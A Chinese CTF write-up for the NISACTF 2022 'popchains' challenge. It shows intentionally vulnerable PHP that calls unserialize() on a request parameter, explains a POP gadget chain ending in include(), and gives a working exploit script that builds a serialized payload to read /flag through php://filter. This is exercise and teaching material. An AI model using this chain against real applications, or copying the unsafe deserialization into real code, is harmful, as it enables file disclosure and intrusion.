NSS [NISACTF 2022]popchains
先看看题目,源码如下。
<?php
// CTF challenge source: a deliberately vulnerable script that demonstrates
// PHP object injection through unserialize() on a request parameter.
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
    // NOTE(review): unserialize() on request data lets the sender pick which
    // declared classes are instantiated and what their properties hold; PHP then
    // runs their magic methods (__wakeup() below). Outside a CTF, decode request
    // data with json_decode(), or at minimum pass ['allowed_classes' => false].
    // A query parameter holding a serialized object (it begins with O:<len>:"Class")
    // is a useful pattern to alert on.
    @unserialize($_GET['wish']); // @ suppresses errors and warnings
} else{
    // No 'wish' parameter: create an instance (not used again in the visible code)
    // and print this file's own source.
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}

// Entry gadget: unserialize() calls __wakeup() on every restored instance.
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    // Reads ->page on whatever $this->string holds; if that object has no
    // accessible 'page' property, its __get() is called instead.
    public function __toString(){
        return $this->string->page;
    }
    // Blacklist check on $this->page. preg_match() needs a string subject, so an
    // object stored in $this->page is converted through its __toString().
    // NOTE(review): only $this->page is checked here; the value that reaches
    // include() in Try_Work_Hard::append() is never validated.
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

// Sink gadget: calling an instance as a function ends in include().
class Try_Work_Hard{
    protected $var;
    // include() on an unvalidated argument; stream wrappers are accepted as well
    // as plain paths, so this is a file-inclusion sink.
    public function append($value){
        include($value);
    }
    // Runs when the object is called like a function.
    public function __invoke(){
        $this->append($this->var);
    }
}

// Bridge gadget: reading an inaccessible property calls whatever $effort holds.
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }
    // $key is ignored; $this->effort is called as a function, which triggers
    // __invoke() when it holds an object that defines one.
    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
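利用链（POP chain）：服务器反序列化 Road_is_Long -> Road_is_Long::__wakeup() -> Road_is_Long::__toString() -> Make_a_Change::__get() -> Try_Work_Hard::__invoke() -> Try_Work_Hard::append()
其中：__wakeup() 里的 preg_match 把 $this->page 当作字符串使用，如果它是一个对象就会触发该对象的 __toString()；__toString() 读取 $this->string->page，而 Make_a_Change 没有 page 属性，于是触发 __get()；__get() 把 $this->effort 当作函数调用，触发 __invoke()，最终进入 append() 里的 include。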
exp: <?php
// Local script that rebuilds the challenge's class declarations, wires the
// objects together and prints the URL-encoded serialized string.
// The class bodies are copies of the challenge source; only the default value
// of Try_Work_Hard::$var differs.
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected $var="php://filter/read=convert.base64-encode/resource=/flag"; // protected: cannot be assigned from outside the class, so it is set in the declaration
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }
    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}

$road1 = new Road_is_Long();
$road2 = new Road_is_Long();
$try = new Try_Work_Hard();
$make = new Make_a_Change();
// Object graph: $road1->page is $road2, $road2->string is $make, and
// $make->effort is $try, matching the order of the magic-method calls.
$road1->page = $road2;
$road2->string=$make;
$make->effort=$try;
$jay17 = serialize($road1);
// A serialized protected property name contains NUL bytes, hence urlencode().
echo urlencode($jay17);